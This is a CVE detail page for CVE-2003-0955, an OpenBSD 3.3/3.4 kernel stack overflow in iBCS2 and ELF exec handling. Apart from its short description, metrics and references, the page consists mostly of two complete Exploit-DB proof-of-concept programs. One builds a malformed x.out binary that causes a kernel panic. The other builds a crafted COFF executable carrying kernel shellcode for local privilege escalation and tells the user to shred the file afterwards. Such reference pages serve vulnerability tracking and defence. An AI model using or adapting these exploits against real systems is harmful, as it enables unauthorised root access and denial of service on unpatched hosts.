CVE-2003-0955 : Detail

CVE-2003-0955

0.5%V4
Local
2003-11-21
04h00 +00:00
2016-10-17
11h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

OpenBSD kernel 3.3 and 3.4 allows local users to cause a denial of service (kernel panic) and possibly execute arbitrary code in 3.4 via a program with an invalid header that is not properly handled by (1) ibcs2_exec.c in the iBCS2 emulation (compat_ibcs2) or (2) exec_elf.c, which leads to a stack-based buffer overflow.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 118

Publication date : 2003-11-06 23h00 +00:00
Author : Scott Bartram
EDB Verified : Yes

// // Patch ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/005_exec.patch // #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <stdio.h> /* $OpenBSD: ibcs2_exec.h,v 1.3 2002/03/14 01:26:50 millert Exp $ */ /* $NetBSD: ibcs2_exec.h,v 1.4 1995/03/14 15:12:24 scottb Exp $ */ /* * Copyright (c) 1994, 1995 Scott Bartram * All rights reserved. * * adapted from sys/sys/exec_ecoff.h * based on Intel iBCS2 * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software without specific prior written permission * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #ifndef _IBCS2_EXEC_H_ #define _IBCS2_EXEC_H_ /* * COFF file header */ struct coff_filehdr { u_short f_magic; /* magic number */ u_short f_nscns; /* # of sections */ long f_timdat; /* timestamp */ long f_symptr; /* file offset of symbol table */ long f_nsyms; /* # of symbol table entries */ u_short f_opthdr; /* size of optional header */ u_short f_flags; /* flags */ }; /* f_magic flags */ #define COFF_MAGIC_I386 0x14c /* f_flags */ #define COFF_F_RELFLG 0x1 #define COFF_F_EXEC 0x2 #define COFF_F_LNNO 0x4 #define COFF_F_LSYMS 0x8 #define COFF_F_SWABD 0x40 #define COFF_F_AR16WR 0x80 #define COFF_F_AR32WR 0x100 /* * COFF system header */ struct coff_aouthdr { short a_magic; short a_vstamp; long a_tsize; long a_dsize; long a_bsize; long a_entry; long a_tstart; long a_dstart; }; /* magic */ #define COFF_OMAGIC 0407 /* text not write-protected; data seg is contiguous with text */ #define COFF_NMAGIC 0410 /* text is write-protected; data starts at next seg following text */ #define COFF_ZMAGIC 0413 /* text and data segs are aligned for direct paging */ #define COFF_SMAGIC 0443 /* shared lib */ /* * COFF section header */ struct coff_scnhdr { char s_name[8]; long s_paddr; long s_vaddr; long s_size; long s_scnptr; long s_relptr; long s_lnnoptr; u_short s_nreloc; u_short s_nlnno; long s_flags; }; /* s_flags */ #define COFF_STYP_REG 0x00 #define COFF_STYP_DSECT 0x01 #define COFF_STYP_NOLOAD 0x02 #define COFF_STYP_GROUP 0x04 #define COFF_STYP_PAD 0x08 #define COFF_STYP_COPY 0x10 #define COFF_STYP_TEXT 0x20 #define COFF_STYP_DATA 0x40 #define COFF_STYP_BSS 0x80 #define COFF_STYP_INFO 0x200 #define COFF_STYP_OVER 0x400 #define COFF_STYP_SHLIB 0x800 /* * COFF shared library header */ struct coff_slhdr { long entry_len; /* in words */ long path_index; /* in words */ char sl_name[1]; }; #define COFF_ROUND(val, by) (((val) + by - 1) & ~(by - 1)) #define COFF_ALIGN(a) ((a) & ~(COFF_LDPGSZ - 1)) #define COFF_HDR_SIZE \ (sizeof(struct coff_filehdr) + sizeof(struct coff_aouthdr)) #define COFF_BLOCK_ALIGN(ap, value) \ (ap->a_magic == COFF_ZMAGIC ? COFF_ROUND(value, COFF_LDPGSZ) : \ value) #define COFF_TXTOFF(fp, ap) \ (ap->a_magic == COFF_ZMAGIC ? 0 : \ COFF_ROUND(COFF_HDR_SIZE + fp->f_nscns * \ sizeof(struct coff_scnhdr), COFF_SEGMENT_ALIGNMENT(ap))) #define COFF_DATOFF(fp, ap) \ (COFF_BLOCK_ALIGN(ap, COFF_TXTOFF(fp, ap) + ap->a_tsize)) #define COFF_SEGMENT_ALIGN(ap, value) \ (COFF_ROUND(value, (ap->a_magic == COFF_ZMAGIC ? COFF_LDPGSZ : \ COFF_SEGMENT_ALIGNMENT(ap)))) #define COFF_LDPGSZ 4096 #define COFF_SEGMENT_ALIGNMENT(ap) 4 #define COFF_BADMAG(ex) (ex->f_magic != COFF_MAGIC_I386) #define IBCS2_HIGH_SYSCALL(n) (((n) & 0x7f) == 0x28) #define IBCS2_CVT_HIGH_SYSCALL(n) (((n) >> 8) + 128) struct exec_package; int exec_ibcs2_coff_makecmds(struct proc *, struct exec_package *); /* * x.out (XENIX) */ struct xexec { u_short x_magic; /* magic number */ u_short x_ext; /* size of extended header */ long x_text; /* ignored */ long x_data; /* ignored */ long x_bss; /* ignored */ long x_syms; /* ignored */ long x_reloc; /* ignored */ long x_entry; /* executable entry point */ char x_cpu; /* processor type */ char x_relsym; /* ignored */ u_short x_renv; /* flags */ }; /* x_magic flags */ #define XOUT_MAGIC 0x0206 /* x_cpu flags */ #define XC_386 0x004a /* 386, word-swapped */ /* x_renv flags */ #define XE_V5 0xc000 #define XE_SEG 0x0800 #define XE_ABS 0x0400 #define XE_ITER 0x0200 #define XE_VMOD 0x0100 #define XE_FPH 0x0080 #define XE_LTEXT 0x0040 #define XE_LDATA 0x0020 #define XE_OVER 0x0010 #define XE_FS 0x0008 #define XE_PURE 0x0004 #define XE_SEP 0x0002 #define XE_EXEC 0x0001 /* * x.out extended header */ struct xext { long xe_trsize; /* ignored */ long xe_drsize; /* ignored */ long xe_tbase; /* ignored */ long xe_dbase; /* ignored */ long xe_stksize; /* stack size if XE_FS set in x_renv */ long xe_segpos; /* offset of segment table */ long xe_segsize; /* segment table size */ long xe_mdtpos; /* ignored */ long xe_mdtsize; /* ignored */ char xe_mdttype; /* ignored */ char xe_pagesize; /* ignored */ char xe_ostype; /* ignored */ char xe_osvers; /* ignored */ u_short xe_eseg; /* ignored */ u_short xe_sres; /* ignored */ }; /* * x.out segment table */ struct xseg { u_short xs_type; /* segment type */ u_short xs_attr; /* attribute flags */ u_short xs_seg; /* segment selector number */ char xs_align; /* ignored */ char xs_cres; /* ignored */ long xs_filpos; /* offset of this segment */ long xs_psize; /* physical segment size */ long xs_vsize; /* virtual segment size */ long xs_rbase; /* relocation base address */ u_short xs_noff; /* ignored */ u_short xs_sres; /* ignored */ long xs_lres; /* ignored */ }; /* xs_type flags */ #define XS_TNULL 0 /* unused */ #define XS_TTEXT 1 /* text (read-only) */ #define XS_TDATA 2 /* data (read-write) */ #define XS_TSYMS 3 /* symbol table (noload) */ #define XS_TREL 4 /* relocation segment (noload) */ #define XS_TSESTR 5 /* string table (noload) */ #define XS_TGRPS 6 /* group segment (noload) */ #define XS_TIDATA 64 #define XS_TTSS 65 #define XS_TLFIX 66 #define XS_TDNAME 67 #define XS_TDTEXT 68 #define XS_TDFIX 69 #define XS_TOVTAB 70 #define XS_T71 71 #define XS_TSYSTR 72 /* xs_attr flags */ #define XS_AMEM 0x8000 /* memory image */ #define XS_AITER 0x0001 /* iteration records */ #define XS_AHUGE 0x0002 /* unused */ #define XS_ABSS 0x0004 /* uninitialized data */ #define XS_APURE 0x0008 /* read-only (sharable) segment */ #define XS_AEDOWN 0x0010 /* expand down memory segment */ #define XS_APRIV 0x0020 /* unused */ #define XS_A32BIT 0x0040 /* 32-bit text/data */ /* * x.out iteration record */ struct xiter { long xi_size; /* text/data size */ long xi_rep; /* number of replications */ long xi_offset; /* offset within segment to replicated data */ }; #define XOUT_HDR_SIZE (sizeof(struct xexec) + sizeof(struct xext)) int exec_ibcs2_xout_makecmds(struct proc *, struct exec_package *); #endif /* !_IBCS2_EXEC_H_ */ int main(int ac,char **av) { int fd; struct xexec xp; struct xext xep; char exe[10]; char fil[]="./vvc"; fd=open(fil,O_CREAT|O_RDWR,0700); if (fd==-1) {perror("open");return 1;} memset(&xp,0,sizeof(xp)); memset(&xep,0,sizeof(xep)); memset(exe,'v',sizeof(exe)); xp.x_magic = XOUT_MAGIC; xp.x_cpu = XC_386; xp.x_renv = XE_EXEC; xp.x_ext = sizeof(xep); xep.xe_segsize = -1; write(fd,&xp,sizeof(xp)); write(fd,&xep,sizeof(xep)); write(fd,exe,sizeof(exe)); printf("Now exec %s\n",fil); } // milw0rm.com [2003-11-07]
Exploit Database EDB-ID : 125

Publication date : 2003-11-18 23h00 +00:00
Author : Sinan Eren
EDB Verified : Yes

/** OpenBSD 2.x - 3.3 **/ /** exec_ibcs2_coff_prep_zmagic() kernel stack overflow **/ /** note: ibcs2 binary compatibility with SCO and ISC is enabled **/ /** in the default install **/ /** Copyright Feb 26 2003 Sinan "noir" Eren **/ /** noir olympos org | noir uberhax0r net **/ /** greets to brother nahual for making this usefull! **/ #include <stdio.h> #include <sys/types.h> #include <fcntl.h> #include <unistd.h> #include <sys/param.h> #include <sys/sysctl.h> #include <sys/signal.h> //#include "ibcs2_exec.h" /* kernel_sc.s shellcode */ /* much improved the opcode search, fixed the stupid logic bug! */ unsigned char shellcode[] = "\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe" "\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89" "\x42\x04\x8b\x51\x14\x89\x42\x0c\x8d\x6c\x24\x68\x0f\x01\x4f\x04\x8b" "\x5f\x06\x8b\x93\x00\x04\x00\x00\x8b\x8b\x04\x04\x00\x00\xc1\xe9\x10" "\xc1\xe1\x10\xc1\xe2\x10\xc1\xea\x10\x09\xca\x31\xc9\x41\x8a\x1c\x0a" "\x80\xfb\xe8\x75\xf7\x8d\x1c\x0a\x41\x8b\x0c\x0a\x83\xc1\x05\x01\xd9" "\x89\xcf\xb0\xff\xfc\xb9\xff\xff\xff\xff\xf2\xae\x8a\x1f\x80\xfb\xd0" "\x75\xef\x47\x31\xc0\x57\xc3"; /* do not use! */ /* silvio gotta get his brain together and understand why sometimes you need to return to kernel code rather than setting the selectors pushing ss,esp,eflag,cs,eip and do an iret! well, aloha?? vnode locks being held ? mutex locks being held ? you have to return to the kernel code that unlocks the syncronization objects */ unsigned char iret_shellcode[] = "\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe" "\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89" "\x42\x04\x8b\x51\x14\x89\x42\x0c\xfa\x6a\x1f\x07\x6a\x1f\x1f\x6a\x00" "\x5f\x6a\x00\x5e\x68\x00\xd0\xbf\xdf\x5d\x6a\x00\x5b\x6a\x00\x5a\x6a" "\x00\x59\x6a\x00\x58\x6a\x1f\x68\x00\xd0\xbf\xdf\x68\x87\x02\x00\x00" "\x6a\x17"; unsigned char pusheip[] = "\x68\x00\x00\x00\x00"; /* fill eip */ unsigned char iret[] = "\xcf"; unsigned char exitsh[] = "\x31\xc0\xcd\x80\xcc"; /* xorl %eax,%eax, int $0x80, int3 */ #define ZERO(p) memset(&p, 0x00, sizeof(p)) /* * COFF file header */ struct coff_filehdr { u_short f_magic; /* magic number */ u_short f_nscns; /* # of sections */ long f_timdat; /* timestamp */ long f_symptr; /* file offset of symbol table */ long f_nsyms; /* # of symbol table entries */ u_short f_opthdr; /* size of optional header */ u_short f_flags; /* flags */ }; /* f_magic flags */ #define COFF_MAGIC_I386 0x14c /* f_flags */ #define COFF_F_RELFLG 0x1 #define COFF_F_EXEC 0x2 #define COFF_F_LNNO 0x4 #define COFF_F_LSYMS 0x8 #define COFF_F_SWABD 0x40 #define COFF_F_AR16WR 0x80 #define COFF_F_AR32WR 0x100 /* * COFF system header */ struct coff_aouthdr { short a_magic; short a_vstamp; long a_tsize; long a_dsize; long a_bsize; long a_entry; long a_tstart; long a_dstart; }; /* magic */ #define COFF_ZMAGIC 0413 /* * COFF section header */ struct coff_scnhdr { char s_name[8]; long s_paddr; long s_vaddr; long s_size; long s_scnptr; long s_relptr; long s_lnnoptr; u_short s_nreloc; u_short s_nlnno; long s_flags; }; /* s_flags */ #define COFF_STYP_TEXT 0x20 #define COFF_STYP_DATA 0x40 #define COFF_STYP_SHLIB 0x800 void get_proc(pid_t, struct kinfo_proc *); void sig_handler(); int main(int argc, char **argv) { u_int i, fd, debug = 0; u_char *ptr, *shptr; u_long *lptr; u_long pprocadr, offset; struct kinfo_proc kp; char *args[] = { "./ibcs2own", NULL}; char *envs[] = { "RIP=theo", NULL}; //COFF structures struct coff_filehdr fhdr; struct coff_aouthdr ahdr; struct coff_scnhdr scn0, scn1, scn2; if(argv[1]) { if(!strncmp(argv[1], "-v", 2)) debug = 1; else { printf("-v: verbose flag only\n"); exit(0); } } ZERO(fhdr); fhdr.f_magic = COFF_MAGIC_I386; fhdr.f_nscns = 3; //TEXT, DATA, SHLIB fhdr.f_timdat = 0xdeadbeef; fhdr.f_symptr = 0x4000; fhdr.f_nsyms = 1; fhdr.f_opthdr = sizeof(ahdr); //AOUT opt header size fhdr.f_flags = COFF_F_EXEC; ZERO(ahdr); ahdr.a_magic = COFF_ZMAGIC; ahdr.a_tsize = 0; ahdr.a_dsize = 0; ahdr.a_bsize = 0; ahdr.a_entry = 0x10000; ahdr.a_tstart = 0; ahdr.a_dstart = 0; ZERO(scn0); memcpy(&scn0.s_name, ".text", 5); scn0.s_paddr = 0x10000; scn0.s_vaddr = 0x10000; scn0.s_size = 4096; scn0.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3); //file offset of .text segment scn0.s_relptr = 0; scn0.s_lnnoptr = 0; scn0.s_nreloc = 0; scn0.s_nlnno = 0; scn0.s_flags = COFF_STYP_TEXT; ZERO(scn1); memcpy(&scn1.s_name, ".data", 5); scn1.s_paddr = 0x10000 - 4096; scn1.s_vaddr = 0x10000 - 4096; scn1.s_size = 4096; scn1.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 4096; //file offset of .data segment scn1.s_relptr = 0; scn1.s_lnnoptr = 0; scn1.s_nreloc = 0; scn1.s_nlnno = 0; scn1.s_flags = COFF_STYP_DATA; ZERO(scn2); memcpy(&scn2.s_name, ".shlib", 6); scn2.s_paddr = 0; scn2.s_vaddr = 0; scn2.s_size = 0xb0; //HERE IS DA OVF!!! static_buffer = 128 scn2.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 2*4096; //file offset of .data segment scn2.s_relptr = 0; scn2.s_lnnoptr = 0; scn2.s_nreloc = 0; scn2.s_nlnno = 0; scn2.s_flags = COFF_STYP_SHLIB; offset = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 3*4096; ptr = (char *) malloc(offset); if(!ptr) { perror("malloc"); exit(-1); } memset(ptr, 0xcc, offset); /* fill int3 */ /* copy sections */ offset = 0; memcpy(ptr, (char *) &fhdr, sizeof(fhdr)); offset += sizeof(fhdr); memcpy(ptr+offset, (char *) &ahdr, sizeof(ahdr)); offset += sizeof(ahdr); memcpy(ptr+offset, (char *) &scn0, sizeof(scn0)); offset += sizeof(scn0); memcpy(ptr+offset, &scn1, sizeof(scn1)); offset += sizeof(scn1); memcpy(ptr+offset, (char *) &scn2, sizeof(scn2)); offset += sizeof(scn2); lptr = (u_long *) ((char *)ptr + sizeof(fhdr) + sizeof(ahdr) + \ (sizeof(scn0) * 3) + 4096 + 4096 + 0xb0 - 8); shptr = (char *) malloc(4096); if(!shptr) { perror("malloc"); exit(-1); } if(debug) printf("payload adr: 0x%.8x\t", shptr); memset(shptr, 0xcc, 4096); get_proc((pid_t) getppid(), &kp); pprocadr = (u_long) kp.kp_eproc.e_paddr; if(debug) printf("parent proc adr: 0x%.8x\n", pprocadr); *lptr++ = 0xdeadbeef; *lptr = (u_long) shptr; shellcode[5] = pprocadr & 0xff; shellcode[6] = (pprocadr >> 8) & 0xff; shellcode[7] = (pprocadr >> 16) & 0xff; shellcode[8] = (pprocadr >> 24) & 0xff; memcpy(shptr, shellcode, sizeof(shellcode)-1); unlink("./ibcs2own"); if((fd = open("./ibcs2own", O_CREAT^O_RDWR, 0755)) < 0) { perror("open"); exit(-1); } write(fd, ptr, sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0) * 3) + 4096 + 4096 + 4096); close(fd); free(ptr); signal(SIGSEGV, (void (*)())sig_handler); signal(SIGILL, (void (*)())sig_handler); signal(SIGSYS, (void (*)())sig_handler); signal(SIGBUS, (void (*)())sig_handler); signal(SIGABRT, (void (*)())sig_handler); signal(SIGTRAP, (void (*)())sig_handler); printf("\nDO NOT FORGET TO SHRED ./ibcs2own\n"); execve(args[0], args, envs); perror("execve"); } void sig_handler() { _exit(0); } void get_proc(pid_t pid, struct kinfo_proc *kp) { u_int arr[4], len; arr[0] = CTL_KERN; arr[1] = KERN_PROC; arr[2] = KERN_PROC_PID; arr[3] = pid; len = sizeof(struct kinfo_proc); if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) { perror("sysctl"); fprintf(stderr, "this is an unexpected error, rerun!\n"); exit(-1); } } // milw0rm.com [2003-11-19]

Products Mentioned

Configuraton 0

Openbsd>>Openbsd >> Version 3.3

Openbsd>>Openbsd >> Version 3.4

References

http://www.openbsd.org/errata33.html
Tags : vendor-advisory, x_refsource_OPENBSD
http://www.securityfocus.com/bid/8978
Tags : vdb-entry, x_refsource_BID
The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.